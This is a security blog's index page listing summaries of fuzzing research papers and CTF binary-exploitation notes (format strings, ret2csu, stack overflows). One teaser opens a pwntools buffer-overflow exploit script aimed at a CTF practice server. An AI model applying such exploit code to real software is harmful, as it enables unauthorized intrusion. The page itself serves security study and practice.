Poster Automated Discovery of Sensor Spoofing Attacks on Robotic Vehicles

Poste:机器人车辆传感器欺骗攻击的自动发现 摘要 在本文中,我们提出了一个新的传感器模糊框架SensorFuzz,它可以系统地发现机器人车辆...

June 22, 2023 · 2 min · 758 words · JUHUA 创建: June 22, 2023 | 更新: June 22, 2023 | 时长: 2分钟 | JUHUA

ProFuzzer On-the-fly Input Type Probing for Better Zero-day Vulnerability Discovery

文译名:profuzzer:实时输入类型探测,以更好地发现零日漏洞 作者:游伟 单位:普顿大学 国家: #美国 年份: #2019年 来源: #SP 关键字: #fuzzing 代...

June 22, 2023 · 2 min · 990 words · JUHUA 创建: June 22, 2023 | 更新: June 22, 2023 | 时长: 2分钟 | JUHUA

PWN格式化字符串漏洞

![[刷题#2023.2.9 JarvisOJ fm]]

June 22, 2023 · 1 min · 16 words · JUHUA 创建: June 22, 2023 | 更新: June 22, 2023 | 时长: 1分钟 | JUHUA

PWN简单题题解

picoctf_2018_buffer overflow 2 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 from pwn import * from LibcSearcher import* # context(arch = 'amd64', os = 'linux', log_level = 'debug') context.log_level = 'debug' elf = ELF('./bin/PicoCTF_2018_buffer_overflow_2') p = remote('node4.buuoj.cn', 28842) # elf win = elf.symbols['win'] main_addr = elf.symbols['main'] a1 = 0x0DEADBEEF a2 = 0x0DEADC0DE print(p.recvline()) payload = b'a' * 0x6c...

June 22, 2023 · 7 min · 3264 words · JUHUA 创建: June 22, 2023 | 更新: June 22, 2023 | 时长: 7分钟 | JUHUA

pwn细碎知识

「二进制安全pwn基础」 - 网安 知识点 [[静态链接栈溢出]] 如何将一个数转化为底层二进制的机器码,最简单的方式就是在IDA中直接看汇编 (80条...

June 22, 2023 · 6 min · 2704 words · JUHUA 创建: June 22, 2023 | 更新: June 22, 2023 | 时长: 6分钟 | JUHUA

ret2csu(以ciscn_2019_s_3为例子)

参考:(67条消息) 中级ROP之ret2csu_西杭的博客-CSDN博客 适用场景 在我们想要调用系统调用,或者在 64 位程序中通过寄存器传递参数,...

June 22, 2023 · 4 min · 1722 words · JUHUA 创建: June 22, 2023 | 更新: June 22, 2023 | 时长: 4分钟 | JUHUA

Revery from Proof-of-Concept to Exploitable

中文译名:revery: 从概念验证到可利用 作者:Yan Wang 单位:IIE 国家: #中国 年份: #2018年 来源: #ccs 关键字: #AGE #fuzzing 代码地址: 笔记建立时间...

June 22, 2023 · 1 min · 140 words · JUHUA 创建: June 22, 2023 | 更新: June 22, 2023 | 时长: 1分钟 | JUHUA

Semantic-Informed Driver Fuzzing Without Both the Hardware Devices and the Emulators

中文译名:不需要硬件设备和模拟器的语义驱动模糊 作者:Wenjia Zhao 单位:西安交通大学 国家: #中国 年份: #2022年 来源: #NDSS会议 关键字...

June 22, 2023 · 11 min · 5177 words · JUHUA 创建: June 22, 2023 | 更新: June 22, 2023 | 时长: 11分钟 | JUHUA

SemFuzz Semantics-based Automatic Generation of Proof-of-Concept Exploits

中文译名:SemFuzz:基于语义的概念验证漏洞自动生成 作者:wei you btw 二作和三作是 IIE,三作是陈凯 单位:印第安纳大学伯明顿分校 国家: #美...

June 22, 2023 · 9 min · 4321 words · JUHUA 创建: June 22, 2023 | 更新: June 22, 2023 | 时长: 9分钟 | JUHUA

SemFuzz 总结笔记

information source common vulnerabilities and exposures (CVE) systems CVE - CVE (mitre.org) Linux git logs CVE - CVE (mitre.org) bug descriptions posted on forums and blogs SEMANTIC INFORMATION RETRIEVING NLP tool process these information, output calling sequence. so, fuzzer utilizes the sequences to guidline the fuzz this part i want know how the fuzzer use these sequences, how two prune the unreachable path I noticed that the example both have...

June 22, 2023 · 1 min · 467 words · JUHUA 创建: June 22, 2023 | 更新: June 22, 2023 | 时长: 1分钟 | JUHUA